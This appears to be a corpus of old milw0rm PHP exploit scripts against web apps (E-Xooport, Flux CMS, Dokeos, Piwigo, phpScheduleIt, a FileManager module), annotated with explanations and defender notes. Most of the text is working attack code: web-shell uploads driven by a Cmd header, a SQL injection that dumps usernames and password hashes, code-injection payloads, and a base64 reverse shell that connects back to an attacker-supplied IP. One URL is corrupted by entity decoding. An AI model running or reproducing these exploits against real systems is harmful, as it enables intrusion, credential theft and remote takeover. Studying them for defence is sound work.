 * in .php and on requests carrying a `Cmd:` header.
 */
function upload() { global $host, $path; $payload = "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"Submit\"\r\n\r\n\"Send\"\r\n"; $payload .= "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"poc.php\"\r\n\r\n"; $payload .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n"; $payload .= "--o0oOo0o--\r\n"; $packet = "POST {$path}?L=interact.file&id=0 HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($payload) . "\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload; http_send($host, $packet); $packet = "GET {$path}system/cache/temp/ HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; if (preg_match("/[0-9]*_poc.php/", http_send($host, $packet), $match)) { return $match[0]; } die("\n[-] Directory listing denied\n"); }
/*
 * Fragment: this line begins inside a function whose header and first part are
 * not shown (the leading `}` braces close loops opened there), and relies on
 * $host, $path, $uid, $s, $string and the helpers makePacket(), getContent()
 * and http_send() from elsewhere in the file.
 *
 * Exploit-corpus sample (E-Xooport): UNION-based SQL injection that walks a
 * users table row by row (LIMIT [N],1) extracting uid:uname:pass between the
 * $string delimiters, prints each row and appends the dump to
 * exooport_log.txt. fwrite(fopen(...)) never closes the handle; ereg() is the
 * deprecated POSIX regex API.
 *
 * Defender notes: bind parameters and do not echo query results into template
 * text; alert on "union+select" / "concat(" in query strings and on repeated
 * requests differing only in a LIMIT offset.
 */
$table = $reg[1]; } $ex = str_replace("[N]", $k, $sql); $txt = getContent(http_send($host, makePacket($path, $ex, $host))); } } print "\n\n [] Table = {$table}\n\n"; if (!$uid) { $sql = "-1+union+select+concat({$s},uid,0x3a,uname,0x3a,pass,{$s}),0+from+{$table}+limit+[N],1"; } else { $sql = "-1+union+select+concat({$s},uid,0x3a,uname,0x3a,pass,{$s}),0+from+{$table}+where+uid={$uid}+limit+[N],1"; } $regs = array(); $regex = $string . "(.+)" . $string; $n = 0; $ex = str_replace("[N]", $n, $sql); $pck = makePacket($path, $ex, $host); $resp = http_send($host, $pck); $txt = getContent($resp); while (ereg($regex, $txt, $regs)) { $users .= $regs[1] . "\n"; print $regs[1] . "\n"; $n++; $pck = makePacket($path, str_replace("[N]", $n, $sql), $host); $resp = http_send($host, $pck); $txt = getContent($resp); } $write = "\n\nVis Intelligendi" . "\n E-Xooport 3.1 SQL Injection Exploit\n" . "http://vis-intelligendi.co.cc\n" . "Host : {$host}\n" . "Path : {$path}\n" . "http://{$host}{$path}{$sql}\n\n" . "table: {$table}\n\n" . $users . "\n\n Vis Intelligendi Magia"; fwrite(fopen("exooport_log.txt", "w+"), $write); print "Check exooport_log.txt"; }
/*
 * Fragment: this line starts with the closing of an if-block from lines not
 * shown; $host and $path are set earlier and http_send() is defined elsewhere.
 *
 * Exploit-corpus sample (Flux CMS): interactive loop that requests
 * webinc/bxe/scripts/loadsave.php — evidently overwritten with a web shell by
 * the earlier part of the script — with a base64 command in the `Cmd` header,
 * printing the text after the "_code_" marker. On exit a final request carrying
 * an empty `Back:` header asks the implanted shell to restore the original
 * file. `define(STDIN, …)` uses a bare constant name and re-opens stdin.
 *
 * Defender notes: script files under the web root must not be writable by the
 * web server user; alert on requests with `Cmd:` or `Back:` headers and on
 * content changes to loadsave.php.
 */
die("\n[-] Exploit failed...\n"); } define(STDIN, fopen("php://stdin", "r")); while (1) { print "\nfluxcms-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $packet = "GET {$path}webinc/bxe/scripts/loadsave.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: " . base64_encode($cmd) . "\r\n"; $packet .= "Connection: close\r\n\r\n"; $output = http_send($host, $packet); if (!preg_match("/_code_/", $output)) { die("\n[-] Exploit failed...\n"); } $shell = explode("_code_", $output); print "\n" . $shell[1]; } else { break; } } // backup the original script $packet = "GET {$path}webinc/bxe/scripts/loadsave.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Back:\r\n"; $packet .= "Connection: close\r\n\r\n"; http_send($host, $packet); ?> # milw0rm.com [2008-06-09]
/*
 * Exploit-corpus sample (Dokeos LMS). The banner's first print line precedes
 * this fragment; http_send() is defined elsewhere.
 *
 * The `tablename_column` parameter of whoisonline.php is evidently interpolated
 * into PHP source, so the request closes the open array/brace context and
 * appends `eval(base64_decode($_SERVER[HTTP_CODE]))`; "%23" (#) comments out
 * the rest. The `Code` header carries a base64 reverse shell (the comment
 * attributes it to pentestmonkey's php-reverse-shell) which reads the `IP` and
 * `Port` headers to decide where to connect back; $port defaults to 4444.
 * "[err]" in the response reports a failure from the injected code, and a
 * normal "</html>" means no user was online to trigger the path.
 *
 * Defender notes: alert on "eval(base64_decode($_SERVER[" in query strings and
 * on unusual `Code:` / `IP:` / `Port:` request headers; egress filtering from
 * web tiers blocks the reverse connection even when the injection succeeds.
 */
print "\n| Dokeos LMS <= 1.8.5 (reverse shell) Code Injection Exploit by EgiX |"; print "\n+--------------------------------------------------------------------+\n\n"; if ($argc < 4) { print "\nUsage......: php {$argv['0']} <host> <path> <local IP> [port]\n"; print "\nExample....: php {$argv['0']} localhost /dokeos/ 192.168.0.2"; print "\nExample....: php {$argv['0']} localhost / 192.168.0.2 12345\n"; die; } $host = $argv[1]; $path = $argv[2]; $ip = $argv[3]; $port = isset($argv[4]) ? (int) $argv[4] : 4444; // reverse shell based on http://pentestmonkey.net/tools/php-reverse-shell/ $code = "c2V0X3RpbWVfbGltaXQoMCk7CmluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA1KTsKC" . "iRpcCA9ICRfU0VSVkVSW0hUVFBfSVBdOwokcG9ydCA9ICRfU0VSVkVSW0hUVFBfUE9SVF07CiRjaH" . "Vua19zaXplID0gMjA0ODsKCmlmICghKCRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQpKSkgZGl" . "lKCdbZXJyXUNvbm5lY3Rpb24gdG8geyRpcH06eyRwb3J0fSByZWZ1c2VkJyk7CiRkZXNjcmlwdG9y" . "c3BlYyA9IGFycmF5KDAgPT4gYXJyYXkoJ3BpcGUnLCAncicpLCAxID0+IGFycmF5KCdwaXBlJywgJ" . "3cnKSwgMiA9PiBhcnJheSgncGlwZScsICd3JykpOwppZiAoIWlzX3Jlc291cmNlKCgkcHJvY2Vzcy" . "A9IHByb2Nfb3BlbignL2Jpbi9zaCAtaScsICRkZXNjcmlwdG9yc3BlYywgJHBpcGVzKSkpKSBkaWU" . "oJ1tlcnJdQ2FuXCd0IHNwYXduIHNoZWxsJyk7CgpzdHJlYW1fc2V0X2Jsb2NraW5nKCRwaXBlc1sw" . "XSwgMCk7CnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzFdLCAwKTsKc3RyZWFtX3NldF9ibG9ja" . "2luZygkcGlwZXNbMl0sIDApOwpzdHJlYW1fc2V0X2Jsb2NraW5nKCRzb2NrLCAwKTsKCndoaWxlIC" . "ghZmVvZigkc29jaykgJiYgIWZlb2YoJHBpcGVzWzFdKSkgewoJJHJlYWRfYSA9IGFycmF5KCRzb2N" . "rLCAkcGlwZXNbMV0sICRwaXBlc1syXSk7CgkkbnVtX2NoYW5nZWRfc29ja2V0cyA9IHN0cmVhbV9z" . "ZWxlY3QoJHJlYWRfYSwgJHdyaXRlX2EsICRlcnJvcl9hLCBudWxsKTsKCglpZiAoaW5fYXJyYXkoJ" . "HNvY2ssICRyZWFkX2EpKSB7CgkJJGlucHV0ID0gZnJlYWQoJHNvY2ssICRjaHVua19zaXplKTsKCQ" . "lmd3JpdGUoJHBpcGVzWzBdLCAkaW5wdXQpOwoJfQoJaWYgKGluX2FycmF5KCRwaXBlc1sxXSwgJHJ" . "lYWRfYSkpIHsKCQkkaW5wdXQgPSBmcmVhZCgkcGlwZXNbMV0sICRjaHVua19zaXplKTsKCQlmd3Jp" . "dGUoJHNvY2ssICRpbnB1dCk7Cgl9CglpZiAoaW5fYXJyYXkoJHBpcGVzWzJdLCAkcmVhZF9hKSkge" . 
"woJCSRpbnB1dCA9IGZyZWFkKCRwaXBlc1syXSwgJGNodW5rX3NpemUpOwoJCWZ3cml0ZSgkc29jay" . "wgJGlucHV0KTsKCX0KfQoKZmNsb3NlKCRzb2NrKTsKZmNsb3NlKCRwaXBlc1swXSk7CmZjbG9zZSg" . "kcGlwZXNbMV0pOwpmY2xvc2UoJHBpcGVzWzJdKTsKcHJvY19jbG9zZSgkcHJvY2Vzcyk7CmRpZTsK"; $packet = "GET {$path}whoisonline.php?tablename_column=0];}eval(base64_decode(\$_SERVER[HTTP_CODE]));%23 HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Code: {$code}\r\n"; $packet .= "IP: {$ip}\r\n"; $packet .= "Port: {$port}\r\n"; $packet .= "Connection: close\r\n\r\n"; $response = http_send($host, $packet); if (preg_match("/\\[err\\](.*)/", $response, $match)) { die("[-] Exploit failed ({$match[1]})\n"); } if (preg_match("/<\\/html>/", $response)) { die("[-] Exploit failed (No users online)\n"); } ?> # milw0rm.com [2009-04-21]
/**
 * Exploit-corpus sample (Piwigo): using an admin session cookie (pwg_id from
 * global $sid) it opens the event_tracer plugin page and, when the page says
 * "not active", installs and activates the plugin through two plain GET
 * requests to admin.php. Reads globals $host/$path/$sid; http_send() is
 * defined elsewhere.
 *
 * Corpus artifact: "plugin§ion=" is "plugin&section=" after an HTML entity
 * decoder turned "&sect" into "§", so the first request as shown is broken.
 *
 * Defender notes: plugin install/activate are state-changing actions and
 * should require POST plus an anti-CSRF token; alert on
 * "action=install" / "action=activate" requests for plugins not in the
 * approved set.
 */
function check_plugin() { global $host, $path, $sid; $packet = "GET {$path}%s HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: pwg_id={$sid}\r\n"; $packet .= "Connection: close\r\n\r\n"; // check if the event_tracer plugin isn't installed if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin§ion=event_tracer/event_list.php")))) { http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install")); http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate")); } }
/**
 * Exploit-corpus sample: uploads a PHP web shell through the FileManager
 * module's postlet/javaUpload.php, iterating the global $file_ext list to find
 * an extension the server both accepts (reply contains "POSTLET:YES") and
 * still executes as PHP (filename ".php.<ext>"). The shell runs the base64
 * command from the `Cmd` header between "_code_" markers; the probe GET at
 * {$uploaddir}.php.<ext> checks for that marker. Returns the working
 * extension or false. Reads globals $host/$path/$uploaddir/$file_ext;
 * http_send() is defined elsewhere.
 *
 * Defender notes: reject multiple extensions and disable script execution in
 * the upload directory; alert on multipart filenames matching /\.php\./i and
 * on requests carrying a `Cmd:` header.
 */
function upload() { global $host, $path, $uploaddir, $file_ext; foreach ($file_ext as $ext) { print "\n[-] Trying to upload with .{$ext} extension..."; $data = "--12345\r\n"; $data .= "Content-Disposition: form-data; name=\"userfile\"; filename=\".php.{$ext}\"\r\n"; $data .= "Content-Type: application/octet-stream\r\n\r\n"; $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n"; $data .= "--12345--\r\n"; $packet = "POST {$path}modules/FileManager/postlet/javaUpload.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $data; $html = http_send($host, $packet); if (!eregi("POSTLET:YES", $html)) { die("\n[-] Upload failed!\n"); } $packet = "GET {$path}modules/FileManager/postlet/{$uploaddir}.php.{$ext} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; $html = http_send($host, $packet); if (!eregi("print", $html) and eregi("_code_", $html)) { return $ext; } sleep(1); } return false; }
/*
 * Fragment: this line begins inside the usage `if` block opened on lines not
 * shown; http_send() is defined elsewhere.
 *
 * Exploit-corpus sample (phpScheduleIt): the `start_date` field of reserve.php
 * is evidently interpolated into PHP source, so the value closes the string and
 * call, chains passthru() of the base64 command from the `Cmd` header, and
 * ends with "%23" (#) to comment out the remainder. Because the packet is run
 * through sprintf(), "%%23" collapses to "%23", which is why Content-Length is
 * strlen($payload) - 1. Output between "_code_" markers is printed.
 *
 * Defender notes: never build PHP source or eval() strings from form fields;
 * alert on "passthru(" / "$_SERVER[HTTP_" in POST bodies and on requests
 * carrying a `Cmd:` header.
 */
print "\nUsage......: php {$argv['0']} host path\n"; print "\nExample....: php {$argv['0']} localhost /"; print "\nExample....: php {$argv['0']} localhost /phpscheduleit/\n"; die; } $host = $argv[1]; $path = $argv[2]; $payload = "btnSubmit=1&start_date=1').\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die};%%23"; $packet = "POST {$path}reserve.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Referer: {$path}reserve.php\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Content-Length: " . (strlen($payload) - 1) . "\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload; while (1) { print "\nphpscheduleit-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $html = http_send($host, sprintf($packet, base64_encode($cmd))); $shell = explode("_code_", $html); preg_match("/_code_/", $html) ? print "\n{$shell[1]}" : die("\n[-] Exploit failed...\n"); } else { break; } } ?> # milw0rm.com [2008-10-01]